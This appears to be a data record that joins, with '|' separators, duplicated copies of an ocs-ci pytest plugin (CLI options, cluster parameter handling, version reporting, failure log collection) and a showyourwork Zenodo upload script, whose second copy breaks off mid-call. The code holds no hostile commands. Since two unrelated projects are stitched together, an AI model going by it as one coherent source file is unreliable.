dump_config_to_file(config_file)
log.info(
f"Dump of the consolidated config file is located here: "
f"{config_file}"
)
# Add OCS related versions to the html report and remove
# extraneous metadata
markers_arg = config.getoption("-m")
# add logs url
logs_url = ocsci_config.RUN.get("logs_url")
if logs_url:
config._metadata["Logs URL"] = logs_url
if ocsci_config.RUN["cli_params"].get("teardown") or (
"deployment" in markers_arg
and ocsci_config.RUN["cli_params"].get("deploy")
):
log.info(
"Skipping versions collecting because: Deploy or destroy of "
"cluster is performed."
)
continue
elif ocsci_config.ENV_DATA["skip_ocs_deployment"]:
log.info(
"Skipping version collection because we skipped "
"the OCS deployment"
)
continue
elif ocsci_config.RUN["cli_params"].get("dev_mode"):
log.info("Running in development mode")
continue
# remove extraneous metadata
for extra_meta in ["Python", "Packages", "Plugins", "Platform"]:
if config._metadata.get(extra_meta):
del config._metadata[extra_meta]
config._metadata["Test Run Name"] = get_testrun_name()
gather_version_info_for_report(config)
# switch the configuration context back to the default cluster
ocsci_config.switch_default_cluster_ctx()
def gather_version_info_for_report(config):
"""
This function gather all version related info used for report.
Args:
config (pytest.config): Pytest config object
"""
gather_version_completed = False
try:
# add cluster version
clusterversion = get_cluster_version()
config._metadata["Cluster Version"] = clusterversion
# add ceph version
if not ocsci_config.ENV_DATA["mcg_only_deployment"]:
ceph_version = get_ceph_version()
config._metadata["Ceph Version"] = ceph_version
# add csi versions
csi_versions = get_csi_versions()
config._metadata["cephfsplugin"] = csi_versions.get("csi-cephfsplugin")
config._metadata["rbdplugin"] = csi_versions.get("csi-rbdplugin")
# add ocs operator version
config._metadata["OCS operator"] = get_ocs_build_number()
mods = {}
mods = get_version_info(namespace=ocsci_config.ENV_DATA["cluster_namespace"])
skip_list = ["ocs-operator"]
for key, val in mods.items():
if key not in skip_list:
config._metadata[key] = val.rsplit("/")[-1]
gather_version_completed = True
except ResourceNotFoundError:
log.exception("Problem occurred when looking for some resource!")
except FileNotFoundError:
log.exception("File not found!")
except CommandFailed:
log.exception("Failed to execute command!")
except Exception:
log.exception("Failed to gather version info!")
finally:
if not gather_version_completed:
log.warning(
"Failed to gather version details! The report of version might"
"not be complete!"
)
def get_cli_param(config, name_of_param, default=None):
"""
This is helper function which store cli parameter in RUN section in
cli_params
Args:
config (pytest.config): Pytest config object
name_of_param (str): cli parameter name
default (any): default value of parameter (default: None)
Returns:
any: value of cli parameter or default value
"""
cli_param = config.getoption(name_of_param, default=default)
ocsci_config.RUN["cli_params"][name_of_param] = cli_param
return cli_param
def process_cluster_cli_params(config):
"""
Process cluster related cli parameters
Args:
config (pytest.config): Pytest config object
Raises:
ClusterPathNotProvidedError: If a cluster path is missing
ClusterNameNotProvidedError: If a cluster name is missing
ClusterNameLengthError: If a cluster name is too short or too long
"""
suffix = ocsci_config.cur_index + 1 if ocsci_config.multicluster else ""
cluster_path = get_cli_param(config, f"cluster_path{suffix}")
if not cluster_path:
raise ClusterPathNotProvidedError()
cluster_path = os.path.expanduser(cluster_path)
if not os.path.exists(cluster_path):
os.makedirs(cluster_path)
# Importing here cause once the function is invoked we have already config
# loaded, so this is OK to import once you sure that config is loaded.
from ocs_ci.ocs.openshift_ops import OCP
OCP.set_kubeconfig(
os.path.join(cluster_path, ocsci_config.RUN["kubeconfig_location"])
)
ocsci_config.RUN.update(
{
"kubeconfig": os.path.join(
cluster_path, ocsci_config.RUN["kubeconfig_location"]
)
}
)
cluster_name = get_cli_param(config, f"cluster_name{suffix}")
ocsci_config.RUN["cli_params"]["teardown"] = get_cli_param(
config, "teardown", default=False
)
ocsci_config.RUN["cli_params"]["deploy"] = get_cli_param(
config, "deploy", default=False
)
live_deployment = get_cli_param(
config, "live_deploy", default=False
) or ocsci_config.DEPLOYMENT.get("live_deployment", False)
ocsci_config.DEPLOYMENT["live_deployment"] = live_deployment
if live_deployment:
update_live_must_gather_image()
io_in_bg = get_cli_param(config, "io_in_bg")
if io_in_bg:
ocsci_config.RUN["io_in_bg"] = True
io_load = get_cli_param(config, "io_load")
if io_load:
ocsci_config.RUN["io_load"] = io_load
log_utilization = get_cli_param(config, "log_cluster_utilization")
if log_utilization:
ocsci_config.RUN["log_utilization"] = True
upgrade_ocs_version = get_cli_param(config, "upgrade_ocs_version")
if upgrade_ocs_version:
ocsci_config.UPGRADE["upgrade_ocs_version"] = upgrade_ocs_version
ocs_registry_image = get_cli_param(config, f"ocs_registry_image{suffix}")
if ocs_registry_image:
ocsci_config.DEPLOYMENT["ocs_registry_image"] = ocs_registry_image
upgrade_ocs_registry_image = get_cli_param(config, "upgrade_ocs_registry_image")
if upgrade_ocs_registry_image:
ocsci_config.UPGRADE["upgrade_ocs_registry_image"] = upgrade_ocs_registry_image
ocsci_config.ENV_DATA["cluster_name"] = cluster_name
ocsci_config.ENV_DATA["cluster_path"] = cluster_path
get_cli_param(config, "collect-logs")
if ocsci_config.RUN.get("cli_params").get("deploy"):
if not cluster_name:
raise ClusterNameNotProvidedError()
if (
len(cluster_name) < CLUSTER_NAME_MIN_CHARACTERS
or len(cluster_name) > CLUSTER_NAME_MAX_CHARACTERS
):
raise ClusterNameLengthError(cluster_name)
elif not cluster_name:
try:
ocsci_config.ENV_DATA["cluster_name"] = get_cluster_name(cluster_path)
except FileNotFoundError:
raise ClusterNameNotProvidedError()
if get_cli_param(config, "email") and not get_cli_param(config, "--html"):
pytest.exit("--html option must be provided to send email reports")
get_cli_param(config, "squad_analysis")
get_cli_param(config, "-m")
osd_size = get_cli_param(config, "--osd-size")
if osd_size:
ocsci_config.ENV_DATA["device_size"] = osd_size
ocp_version = get_cli_param(config, "--ocp-version")
if ocp_version:
version_config_file = f"ocp-{ocp_version}-config.yaml"
version_config_file_path = os.path.join(
OCP_VERSION_CONF_DIR, version_config_file
)
load_config_file(version_config_file_path)
upgrade_ocp_version = get_cli_param(config, "--upgrade-ocp-version")
if upgrade_ocp_version:
version_config_file = f"ocp-{upgrade_ocp_version}-upgrade.yaml"
version_config_file_path = os.path.join(
OCP_VERSION_CONF_DIR, version_config_file
)
load_config_file(version_config_file_path)
upgrade_ocp_image = get_cli_param(config, "--upgrade-ocp-image")
if upgrade_ocp_image:
ocp_image = upgrade_ocp_image.rsplit(":", 1)
ocsci_config.UPGRADE["ocp_upgrade_path"] = ocp_image[0]
ocsci_config.UPGRADE["ocp_upgrade_version"] = ocp_image[1]
ocp_installer_version = get_cli_param(config, "--ocp-installer-version")
if ocp_installer_version:
ocsci_config.DEPLOYMENT["installer_version"] = ocp_installer_version
ocsci_config.RUN["client_version"] = ocp_installer_version
csv_change = get_cli_param(config, "--csv-change")
if csv_change:
csv_change = csv_change.split("::")
ocsci_config.DEPLOYMENT["csv_change_from"] = csv_change[0]
ocsci_config.DEPLOYMENT["csv_change_to"] = csv_change[1]
collect_logs_on_success_run = get_cli_param(config, "collect_logs_on_success_run")
if collect_logs_on_success_run:
ocsci_config.REPORTING["collect_logs_on_success_run"] = True
get_cli_param(config, "dev_mode")
ceph_debug = get_cli_param(config, "ceph_debug")
if ceph_debug:
ocsci_config.DEPLOYMENT["ceph_debug"] = True
skip_download_client = get_cli_param(config, "skip_download_client")
if skip_download_client:
ocsci_config.DEPLOYMENT["skip_download_client"] = True
re_trigger_failed_tests = get_cli_param(config, "--re-trigger-failed-tests")
if re_trigger_failed_tests:
ocsci_config.RUN["re_trigger_failed_tests"] = os.path.expanduser(
re_trigger_failed_tests
)
def pytest_collection_modifyitems(session, config, items):
"""
Add Polarion ID property to test cases that are marked with one.
"""
re_trigger_failed_tests = ocsci_config.RUN.get("re_trigger_failed_tests")
if re_trigger_failed_tests:
junit_report = JUnitXml.fromfile(re_trigger_failed_tests)
cases_to_re_trigger = []
for suite in junit_report:
cases_to_re_trigger += [_case.name for _case in suite if _case.result]
for item in items[:]:
if re_trigger_failed_tests and item.name not in cases_to_re_trigger:
log.info(
f"Test case: {item.name} will be removed from execution, "
"because of you provided --re-trigger-failed-tests parameter "
"and this test passed in previous execution from the report!"
)
items.remove(item)
try:
marker = item.get_closest_marker(name="polarion_id")
if marker:
polarion_id = marker.args[0]
if polarion_id:
item.user_properties.append(("polarion-testcase-id", polarion_id))
except IndexError:
log.warning(
f"polarion_id marker found with no value for "
f"{item.name} in {item.fspath}",
exc_info=True,
)
@pytest.hookimpl(tryfirst=True, hookwrapper=True)
def pytest_runtest_makereport(item, call):
outcome = yield
rep = outcome.get_result()
# we only look at actual failing test calls, not setup/teardown
if rep.failed and ocsci_config.RUN.get("cli_params").get("collect-logs"):
test_case_name = item.name
ocp_logs_collection = True if rep.when == "call" else False
mcg = (
True if any(x in item.location[0] for x in ["mcg", "ecosystem"]) else False
)
try:
if not ocsci_config.RUN.get("is_ocp_deployment_failed"):
collect_ocs_logs(
dir_name=test_case_name, ocp=ocp_logs_collection, mcg=mcg
)
except Exception:
log.exception("Failed to collect OCS logs")
# Collect Prometheus metrics if specified in gather_metrics_on_fail marker
if (
(rep.when == "setup" or rep.when == "call")
and rep.failed
and item.get_closest_marker("gather_metrics_on_fail")
):
metrics = item.get_closest_marker("gather_metrics_on_fail").args
try:
collect_prometheus_metrics(
metrics, f"{item.name}-{call.when}", call.start, call.stop
)
except Exception:
log.exception("Failed to collect prometheus metrics")
# Get the performance metrics when tests fails for scale or performance tag
from ocs_ci.helpers.helpers import collect_performance_stats
if (
(rep.when == "setup" or rep.when == "call")
and rep.failed
and (item.get_closest_marker("scale") or item.get_closest_marker("performance"))
):
test_case_name = item.name
try:
collect_performance_stats(test_case_name)
except Exception:
log.exception("Failed to collect performance stats")
def set_log_level(config):
"""
Set the log level of this module based on the pytest.ini log_cli_level
Args:
config (pytest.config): Pytest config object
"""
level = config.getini("log_cli_level") or "INFO"
log.setLevel(logging.getLevelName(level))
| """
This is plugin for all the plugins/hooks related to OCS-CI and its
configuration.
The basic configuration is done in run_ocsci.py module casue we need to load
all the config before pytest run. This run_ocsci.py is just a wrapper for
pytest which proccess config and passes all params to pytest.
"""
import logging
import os
import pytest
from junitparser import JUnitXml
from ocs_ci.framework import config as ocsci_config
from ocs_ci.framework.exceptions import (
ClusterNameLengthError,
ClusterNameNotProvidedError,
ClusterPathNotProvidedError,
)
from ocs_ci.ocs.constants import (
CLUSTER_NAME_MAX_CHARACTERS,
CLUSTER_NAME_MIN_CHARACTERS,
LOG_FORMAT,
OCP_VERSION_CONF_DIR,
)
from ocs_ci.ocs.exceptions import (
CommandFailed,
ResourceNotFoundError,
)
from ocs_ci.ocs.resources.ocs import get_version_info
from ocs_ci.ocs.utils import collect_ocs_logs, collect_prometheus_metrics
from ocs_ci.utility.utils import (
dump_config_to_file,
get_ceph_version,
get_cluster_name,
get_cluster_version,
get_csi_versions,
get_ocs_build_number,
get_testrun_name,
load_config_file,
)
from ocs_ci.utility.reporting import update_live_must_gather_image
__all__ = [
"pytest_addoption",
]
log = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter(LOG_FORMAT))
log.addHandler(handler)
def _pytest_addoption_cluster_specific(parser):
"""
Handle multicluster options here
We will add options which will have suffix number same as its cluster number
i.e `--cluster1 --cluster-name xyz --cluster-path /a/b/c --ocsci-conf /path/to/c1
--ocsci-conf /path/to/c2...` will get translated to `--cluster1 --cluster-name1 xyz
--cluster-path1 /a/b/c --ocsci-conf1 /path/to/c1 --ocsci-conf1 /path/to/c2`
Rest of the general run-ci options will be handled by pytest_addoption
"""
add_common_ocsci_conf = False
for i in range(ocsci_config.nclusters):
# If it's not multicluster then no suffix will be added
suffix = i + 1 if ocsci_config.multicluster else ""
if not add_common_ocsci_conf and ocsci_config.multicluster:
parser.addoption(
"--ocsci-conf",
dest="ocsci_conf",
action="append",
help="Path to config file of OCS CI",
)
add_common_ocsci_conf = True
parser.addoption(
f"--ocsci-conf{suffix}",
dest=f"ocsci_conf{suffix}",
action="append",
help="Path to config file of OCS CI",
)
parser.addoption(
f"--cluster-path{suffix}",
dest=f"cluster_path{suffix}",
help="Path to cluster directory",
)
parser.addoption(
f"--cluster-name{suffix}",
dest=f"cluster_name{suffix}",
help="Name of cluster",
)
parser.addoption(
f"--ocs-version{suffix}",
dest=f"ocs_version{suffix}",
help="ocs version for which ocs-ci to be run",
)
parser.addoption(
f"--ocp-version{suffix}",
dest=f"ocp_version{suffix}",
help="""
OCP version to be used for deployment. This version will be used for
load file from conf/ocp_version/ocp-VERSION-config.yaml. You can use
for example those values:
4.2: for nightly 4.2 OCP build
4.2-ga: for latest GAed 4.2 OCP build
4.2-ga-minus1: for latest GAed 4.2 build - 1
""",
)
parser.addoption(
f"--ocs-registry-image{suffix}",
dest=f"ocs_registry_image{suffix}",
help=(
"ocs registry image to be used for deployment "
"(e.g. quay.io/rhceph-dev/ocs-olm-operator:latest-4.2)"
),
)
parser.addoption(
f"--osd-size{suffix}",
dest=f"osd_size{suffix}",
type=int,
help="OSD size in GB - for 2TB pass 2048, for 0.5TB pass 512 and so on.",
)
def pytest_addoption(parser):
"""
Add necessary options to initialize OCS CI library.
"""
# Handle only cluster specific options from the below call
# Rest of the options which are general, will be handled here itself
_pytest_addoption_cluster_specific(parser)
parser.addoption(
"--teardown",
dest="teardown",
action="store_true",
default=False,
help="If provided the test cluster will be destroyed after tests complete",
)
parser.addoption(
"--deploy",
dest="deploy",
action="store_true",
default=False,
help="If provided a test cluster will be deployed on AWS to use for testing",
)
parser.addoption(
"--live-deploy",
dest="live_deploy",
action="store_true",
default=False,
help="Deploy OCS from live registry like a customer",
)
parser.addoption(
"--email",
dest="email",
help="Email ID to send results",
)
parser.addoption(
"--squad-analysis",
dest="squad_analysis",
action="store_true",
default=False,
help="Include Squad Analysis to email report.",
)
parser.addoption(
"--collect-logs",
dest="collect-logs",
action="store_true",
default=False,
help="Collect OCS logs when test case failed",
)
parser.addoption(
"--collect-logs-on-success-run",
dest="collect_logs_on_success_run",
action="store_true",
default=False,
help="Collect must gather logs at the end of the execution (also when no failure in the tests)",
)
parser.addoption(
"--io-in-bg",
dest="io_in_bg",
action="store_true",
default=False,
help="Run IO in the background",
)
parser.addoption(
"--io-load",
dest="io_load",
help="IOs throughput target percentage. Value should be between 0 to 100",
)
parser.addoption(
"--log-cluster-utilization",
dest="log_cluster_utilization",
action="store_true",
help="Enable logging of cluster utilization metrics every 10 seconds",
)
parser.addoption(
"--upgrade-ocs-version",
dest="upgrade_ocs_version",
help="ocs version to upgrade (e.g. 4.3)",
)
parser.addoption(
"--upgrade-ocp-version",
dest="upgrade_ocp_version",
help="""
OCP version to upgrade to. This version will be used to
load file from conf/ocp_version/ocp-VERSION-config.yaml.
For example:
4.5 (for nightly 4.5 OCP build)
4.5-ga (for latest GAed 4.5 OCP build)
""",
)
parser.addoption(
"--upgrade-ocp-image",
dest="upgrade_ocp_image",
help="""
OCP image to upgrade to. This image string will be split on ':' to
determine the image source and the specified tag to use.
(e.g. quay.io/openshift-release-dev/ocp-release:4.6.0-x86_64)
""",
)
parser.addoption(
"--ocp-installer-version",
dest="ocp_installer_version",
help="""
Specific OCP installer version to be used for deployment. This option
will generally be used for non-GA or nightly builds. (e.g. 4.5.5).
This option will overwrite any values set via --ocp-version.
""",
)
parser.addoption(
"--upgrade-ocs-registry-image",
dest="upgrade_ocs_registry_image",
help=(
"ocs registry image to be used for upgrade "
"(e.g. quay.io/rhceph-dev/ocs-olm-operator:latest-4.3)"
),
)
parser.addoption(
"--flexy-env-file", dest="flexy_env_file", help="Path to flexy environment file"
)
parser.addoption(
"--csv-change",
dest="csv_change",
help=(
"Pattern or string to change in the CSV. Should contain the value to replace "
"from and the value to replace to, separated by '::'"
),
)
parser.addoption(
"--dev-mode",
dest="dev_mode",
action="store_true",
default=False,
help=(
"Runs in development mode. It skips few checks like collecting "
"versions, collecting logs, etc"
),
)
parser.addoption(
"--ceph-debug",
dest="ceph_debug",
action="store_true",
default=False,
help=(
"For OCS cluster deployment with Ceph configured in debug mode. Available for OCS 4.7 and above"
),
)
parser.addoption(
"--skip-download-client",
dest="skip_download_client",
action="store_true",
default=False,
help="Skip the openshift client download step or not",
)
parser.addoption(
"--disable-components",
dest="disable_components",
action="append",
choices=["rgw", "cephfs", "noobaa", "blockpools"],
help=("disable deployment of ocs component:rgw, cephfs, noobaa, blockpools."),
)
parser.addoption(
"--re-trigger-failed-tests",
dest="re_trigger_failed_tests",
help="""
Path to the xunit file for xml junit report from the previous execution.
If the file is provided, the execution will remove all the test cases
which passed and will run only those test cases which were skipped /
failed / or had error in the provided report.
""",
)
parser.addoption(
"--default-cluster-context-index",
dest="default_cluster_context_index",
default=0,
help="""
Sets the default index of the cluster whose context needs to be
loaded when run-ci starts
""",
)
def pytest_configure(config):
"""
Load config files, and initialize ocs-ci library.
Args:
config (pytest.config): Pytest config object
"""
set_log_level(config)
# Somewhat hacky but this lets us differentiate between run-ci executions
# and plain pytest unit test executions
ocscilib_module = "ocs_ci.framework.pytest_customization.ocscilib"
if ocscilib_module not in config.getoption("-p"):
return
for i in range(ocsci_config.nclusters):
log.info(f"Pytest configure switching to: cluster={i}")
ocsci_config.switch_ctx(i)
if not (config.getoption("--help") or config.getoption("collectonly")):
process_cluster_cli_params(config)
config_file = os.path.expanduser(
os.path.join(
ocsci_config.RUN["log_dir"],
f"run-{ocsci_config.RUN['run_id']}-cl{i}-config.yaml",
)
)
dump_config_to_file(config_file)
log.info(
f"Dump of the consolidated config file is located here: "
f"{config_file}"
)
# Add OCS related versions to the html report and remove
# extraneous metadata
markers_arg = config.getoption("-m")
# add logs url
logs_url = ocsci_config.RUN.get("logs_url")
if logs_url:
config._metadata["Logs URL"] = logs_url
if ocsci_config.RUN["cli_params"].get("teardown") or (
"deployment" in markers_arg
and ocsci_config.RUN["cli_params"].get("deploy")
):
log.info(
"Skipping versions collecting because: Deploy or destroy of "
"cluster is performed."
)
continue
elif ocsci_config.ENV_DATA["skip_ocs_deployment"]:
log.info(
"Skipping version collection because we skipped "
"the OCS deployment"
)
continue
elif ocsci_config.RUN["cli_params"].get("dev_mode"):
log.info("Running in development mode")
continue
# remove extraneous metadata
for extra_meta in ["Python", "Packages", "Plugins", "Platform"]:
if config._metadata.get(extra_meta):
del config._metadata[extra_meta]
config._metadata["Test Run Name"] = get_testrun_name()
gather_version_info_for_report(config)
# switch the configuration context back to the default cluster
ocsci_config.switch_default_cluster_ctx()
def gather_version_info_for_report(config):
"""
This function gather all version related info used for report.
Args:
config (pytest.config): Pytest config object
"""
gather_version_completed = False
try:
# add cluster version
clusterversion = get_cluster_version()
config._metadata["Cluster Version"] = clusterversion
# add ceph version
if not ocsci_config.ENV_DATA["mcg_only_deployment"]:
ceph_version = get_ceph_version()
config._metadata["Ceph Version"] = ceph_version
# add csi versions
csi_versions = get_csi_versions()
config._metadata["cephfsplugin"] = csi_versions.get("csi-cephfsplugin")
config._metadata["rbdplugin"] = csi_versions.get("csi-rbdplugin")
# add ocs operator version
config._metadata["OCS operator"] = get_ocs_build_number()
mods = {}
mods = get_version_info(namespace=ocsci_config.ENV_DATA["cluster_namespace"])
skip_list = ["ocs-operator"]
for key, val in mods.items():
if key not in skip_list:
config._metadata[key] = val.rsplit("/")[-1]
gather_version_completed = True
except ResourceNotFoundError:
log.exception("Problem occurred when looking for some resource!")
except FileNotFoundError:
log.exception("File not found!")
except CommandFailed:
log.exception("Failed to execute command!")
except Exception:
log.exception("Failed to gather version info!")
finally:
if not gather_version_completed:
log.warning(
"Failed to gather version details! The report of version might"
"not be complete!"
)
def get_cli_param(config, name_of_param, default=None):
"""
This is helper function which store cli parameter in RUN section in
cli_params
Args:
config (pytest.config): Pytest config object
name_of_param (str): cli parameter name
default (any): default value of parameter (default: None)
Returns:
any: value of cli parameter or default value
"""
cli_param = config.getoption(name_of_param, default=default)
ocsci_config.RUN["cli_params"][name_of_param] = cli_param
return cli_param
def process_cluster_cli_params(config):
"""
Process cluster related cli parameters
Args:
config (pytest.config): Pytest config object
Raises:
ClusterPathNotProvidedError: If a cluster path is missing
ClusterNameNotProvidedError: If a cluster name is missing
ClusterNameLengthError: If a cluster name is too short or too long
"""
suffix = ocsci_config.cur_index + 1 if ocsci_config.multicluster else ""
cluster_path = get_cli_param(config, f"cluster_path{suffix}")
if not cluster_path:
raise ClusterPathNotProvidedError()
cluster_path = os.path.expanduser(cluster_path)
if not os.path.exists(cluster_path):
os.makedirs(cluster_path)
# Importing here cause once the function is invoked we have already config
# loaded, so this is OK to import once you sure that config is loaded.
from ocs_ci.ocs.openshift_ops import OCP
OCP.set_kubeconfig(
os.path.join(cluster_path, ocsci_config.RUN["kubeconfig_location"])
)
ocsci_config.RUN.update(
{
"kubeconfig": os.path.join(
cluster_path, ocsci_config.RUN["kubeconfig_location"]
)
}
)
cluster_name = get_cli_param(config, f"cluster_name{suffix}")
ocsci_config.RUN["cli_params"]["teardown"] = get_cli_param(
config, "teardown", default=False
)
ocsci_config.RUN["cli_params"]["deploy"] = get_cli_param(
config, "deploy", default=False
)
live_deployment = get_cli_param(
config, "live_deploy", default=False
) or ocsci_config.DEPLOYMENT.get("live_deployment", False)
ocsci_config.DEPLOYMENT["live_deployment"] = live_deployment
if live_deployment:
update_live_must_gather_image()
io_in_bg = get_cli_param(config, "io_in_bg")
if io_in_bg:
ocsci_config.RUN["io_in_bg"] = True
io_load = get_cli_param(config, "io_load")
if io_load:
ocsci_config.RUN["io_load"] = io_load
log_utilization = get_cli_param(config, "log_cluster_utilization")
if log_utilization:
ocsci_config.RUN["log_utilization"] = True
upgrade_ocs_version = get_cli_param(config, "upgrade_ocs_version")
if upgrade_ocs_version:
ocsci_config.UPGRADE["upgrade_ocs_version"] = upgrade_ocs_version
ocs_registry_image = get_cli_param(config, f"ocs_registry_image{suffix}")
if ocs_registry_image:
ocsci_config.DEPLOYMENT["ocs_registry_image"] = ocs_registry_image
upgrade_ocs_registry_image = get_cli_param(config, "upgrade_ocs_registry_image")
if upgrade_ocs_registry_image:
ocsci_config.UPGRADE["upgrade_ocs_registry_image"] = upgrade_ocs_registry_image
ocsci_config.ENV_DATA["cluster_name"] = cluster_name
ocsci_config.ENV_DATA["cluster_path"] = cluster_path
get_cli_param(config, "collect-logs")
if ocsci_config.RUN.get("cli_params").get("deploy"):
if not cluster_name:
raise ClusterNameNotProvidedError()
if (
len(cluster_name) < CLUSTER_NAME_MIN_CHARACTERS
or len(cluster_name) > CLUSTER_NAME_MAX_CHARACTERS
):
raise ClusterNameLengthError(cluster_name)
elif not cluster_name:
try:
ocsci_config.ENV_DATA["cluster_name"] = get_cluster_name(cluster_path)
except FileNotFoundError:
raise ClusterNameNotProvidedError()
if get_cli_param(config, "email") and not get_cli_param(config, "--html"):
pytest.exit("--html option must be provided to send email reports")
get_cli_param(config, "squad_analysis")
get_cli_param(config, "-m")
osd_size = get_cli_param(config, "--osd-size")
if osd_size:
ocsci_config.ENV_DATA["device_size"] = osd_size
ocp_version = get_cli_param(config, "--ocp-version")
if ocp_version:
version_config_file = f"ocp-{ocp_version}-config.yaml"
version_config_file_path = os.path.join(
OCP_VERSION_CONF_DIR, version_config_file
)
load_config_file(version_config_file_path)
upgrade_ocp_version = get_cli_param(config, "--upgrade-ocp-version")
if upgrade_ocp_version:
version_config_file = f"ocp-{upgrade_ocp_version}-upgrade.yaml"
version_config_file_path = os.path.join(
OCP_VERSION_CONF_DIR, version_config_file
)
load_config_file(version_config_file_path)
upgrade_ocp_image = get_cli_param(config, "--upgrade-ocp-image")
if upgrade_ocp_image:
ocp_image = upgrade_ocp_image.rsplit(":", 1)
ocsci_config.UPGRADE["ocp_upgrade_path"] = ocp_image[0]
ocsci_config.UPGRADE["ocp_upgrade_version"] = ocp_image[1]
ocp_installer_version = get_cli_param(config, "--ocp-installer-version")
if ocp_installer_version:
ocsci_config.DEPLOYMENT["installer_version"] = ocp_installer_version
ocsci_config.RUN["client_version"] = ocp_installer_version
csv_change = get_cli_param(config, "--csv-change")
if csv_change:
csv_change = csv_change.split("::")
ocsci_config.DEPLOYMENT["csv_change_from"] = csv_change[0]
ocsci_config.DEPLOYMENT["csv_change_to"] = csv_change[1]
collect_logs_on_success_run = get_cli_param(config, "collect_logs_on_success_run")
if collect_logs_on_success_run:
ocsci_config.REPORTING["collect_logs_on_success_run"] = True
get_cli_param(config, "dev_mode")
ceph_debug = get_cli_param(config, "ceph_debug")
if ceph_debug:
ocsci_config.DEPLOYMENT["ceph_debug"] = True
skip_download_client = get_cli_param(config, "skip_download_client")
if skip_download_client:
ocsci_config.DEPLOYMENT["skip_download_client"] = True
re_trigger_failed_tests = get_cli_param(config, "--re-trigger-failed-tests")
if re_trigger_failed_tests:
ocsci_config.RUN["re_trigger_failed_tests"] = os.path.expanduser(
re_trigger_failed_tests
)
def pytest_collection_modifyitems(session, config, items):
"""
Add Polarion ID property to test cases that are marked with one.
"""
re_trigger_failed_tests = ocsci_config.RUN.get("re_trigger_failed_tests")
if re_trigger_failed_tests:
junit_report = JUnitXml.fromfile(re_trigger_failed_tests)
cases_to_re_trigger = []
for suite in junit_report:
cases_to_re_trigger += [_case.name for _case in suite if _case.result]
for item in items[:]:
if re_trigger_failed_tests and item.name not in cases_to_re_trigger:
log.info(
f"Test case: {item.name} will be removed from execution, "
"because of you provided --re-trigger-failed-tests parameter "
"and this test passed in previous execution from the report!"
)
items.remove(item)
try:
marker = item.get_closest_marker(name="polarion_id")
if marker:
polarion_id = marker.args[0]
if polarion_id:
item.user_properties.append(("polarion-testcase-id", polarion_id))
except IndexError:
log.warning(
f"polarion_id marker found with no value for "
f"{item.name} in {item.fspath}",
exc_info=True,
)
@pytest.hookimpl(tryfirst=True, hookwrapper=True)
def pytest_runtest_makereport(item, call):
outcome = yield
rep = outcome.get_result()
# we only look at actual failing test calls, not setup/teardown
if rep.failed and ocsci_config.RUN.get("cli_params").get("collect-logs"):
test_case_name = item.name
ocp_logs_collection = True if rep.when == "call" else False
mcg = (
True if any(x in item.location[0] for x in ["mcg", "ecosystem"]) else False
)
try:
if not ocsci_config.RUN.get("is_ocp_deployment_failed"):
collect_ocs_logs(
dir_name=test_case_name, ocp=ocp_logs_collection, mcg=mcg
)
except Exception:
log.exception("Failed to collect OCS logs")
# Collect Prometheus metrics if specified in gather_metrics_on_fail marker
if (
(rep.when == "setup" or rep.when == "call")
and rep.failed
and item.get_closest_marker("gather_metrics_on_fail")
):
metrics = item.get_closest_marker("gather_metrics_on_fail").args
try:
collect_prometheus_metrics(
metrics, f"{item.name}-{call.when}", call.start, call.stop
)
except Exception:
log.exception("Failed to collect prometheus metrics")
# Get the performance metrics when tests fails for scale or performance tag
from ocs_ci.helpers.helpers import collect_performance_stats
if (
(rep.when == "setup" or rep.when == "call")
and rep.failed
and (item.get_closest_marker("scale") or item.get_closest_marker("performance"))
):
test_case_name = item.name
try:
collect_performance_stats(test_case_name)
except Exception:
log.exception("Failed to collect performance stats")
def set_log_level(config):
"""
Set the log level of this module based on the pytest.ini log_cli_level
Args:
config (pytest.config): Pytest config object
"""
level = config.getini("log_cli_level") or "INFO"
log.setLevel(logging.getLevelName(level))
|
"""
This script is executed from within the ``upload`` rule
to upload files to Zenodo.
"""
import sys
from pathlib import Path
# Hack to import our custom functions
sys.path.insert(0, str(Path(__file__).parents[1]))
from helpers.exceptions import ShowyourworkException, ShowyourworkWarning
from helpers.zenodo import upload_simulation
# Go!
try:
upload_simulation(
snakemake.params["file_name"],
snakemake.params["deposit_id"],
snakemake.params["deposit_title"],
snakemake.params["deposit_description"],
snakemake.params["deposit_creators"],
zenodo_url=snakemake.params["zenodo_url"],
token_name=snakemake.params["token_name"],
file_path=snakemake.params["file_path"],
shell_cmd=snakemake.params["shell_cmd"],
repo_url=snakemake.params["repo_url"],
)
except ShowyourworkException as e:
if "The server could not verify that you are authorized" in e.message:
# Fail silently if the user doesn't have the
# right authentication to upload to the deposit
file_name = snakemake.params["file_name"]
file_path = snakemake.params["file_path"]
with open(f"{file_path}/{file_name}.zenodo", "w") as f:
print("UNAUTHORIZED", file=f)
# Raise a warning on job completion
ShowyourworkWarning(
e.message,
script=e.script,
rule_name=e.rule_name,
context="This error occurred because showyourwork tried to "
f"upload the file {file_name} to Zenodo under a deposit with id "
f"{snakemake.params["deposit_id"]}, but the current user does "
"not have the correct authentication. The API token for Zenodo "
f"should be stored in the environment variable {snakemake.params["token_name"]}, "
"but this token is either missing or invalid for editing the given "
"deposit id. If you are a third-party user (i.e., you cloned someone "
"else's repository and are attempting to build the paper locally), you "
"can either run ``make fast`` "
"to skip the dataset generation & upload step, "
"change the relevant `id` key in the config file to a specific *version* id "
"for the deposit, "
"or provide a concept id which you are authorized to edit; "
"to reserve an id under "
"your authentication, simply type `make reserve`. See the docs for more "
"details.",
brief=f"Unable to upload {file_name} to Zenodo.",
)
else:
raise e | """
This script is executed from within the ``upload`` rule
to upload files to Zenodo.
"""
import sys
from pathlib import Path
# Hack to import our custom functions
sys.path.insert(0, str(Path(__file__).parents[1]))
from helpers.exceptions import ShowyourworkException, ShowyourworkWarning
from helpers.zenodo import upload_simulation
# Go!
try:
upload_simulation(
snakemake.params["file_name"],
snakemake.params["deposit_id"],
snakemake.params["deposit_title"],
snakemake.params["deposit_description"],
snakemake.params["deposit_creators"],
zenodo_url=snakemake.params["zenodo_url"],
token_name=snakemake.params["token_name"],
file_path=snakemake.params["file_path"],
shell_cmd=snakemake.params["shell_cmd"],
repo_url=snakemake.params["repo_url"],
)
except ShowyourworkException as e:
if "The server could not verify that you are authorized" in e.message:
# Fail silently if the user doesn't have the
# right authentication to upload to the deposit
file_name = snakemake.params["file_name"]
file_path = snakemake.params["file_path"]
with open(f"{file_path}/{file_name}.zenodo", "w") as f:
print("UNAUTHORIZED", file=f)
# Raise a warning on job completion
ShowyourworkWarning(
e.message,
script=e.script,
rule_name=e.rule_name,
